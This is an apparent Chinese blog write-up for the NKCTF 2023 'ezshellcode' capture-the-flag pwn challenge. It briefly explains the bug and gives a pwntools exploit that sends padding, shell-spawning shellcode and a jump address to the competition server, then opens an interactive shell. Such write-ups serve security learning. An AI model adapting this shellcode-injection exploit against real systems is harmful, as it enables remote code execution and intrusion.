NKCTF_2023_ezshellcode wp

发布于 2023-03-27 | 标签: shellcode 、 PWN 、 CTF | 1分钟 | 158字数

64位shellcode题目
使用read读入，并用strncpy将读入数据复制到bss段上一处偏移处，随后执行该bss地址加上100以内随机数的偏移的地址处指令(此题随机数无效，可以直接执行bss偏移处)
exp：

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


while True:
    try:
        # io=process("./pwn")
        io=remote("node.yuzhian.com.cn",33905)
        io.recvuntil(b"5 min!\n")
        shellcode=asm(shellcraft.sh())
        payload=cyclic(84)+shellcode.ljust(36,b"a")+p64(0x4040d4)
        # gdb.attach(io)
        # pause()

        io.send(payload)

        io.interactive()

    except:
        io.close()
        continue
        
        

# pwn部分题目的临时静态平台
# ctf.comentropy.cn
# comentropy.cn
# 8301 8302 8303 8304

本文作者： WIN_250
本文链接： https://oraclepi.tech/post/xiJWhqm91/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

# shellcode # PWN # CTF

NKCTF_2023_story wp 上一篇

babyheap_0ctf_2017 wp 下一篇

NKCTF_2023_ezshellcode wp

感谢您的支持，我会继续努力的!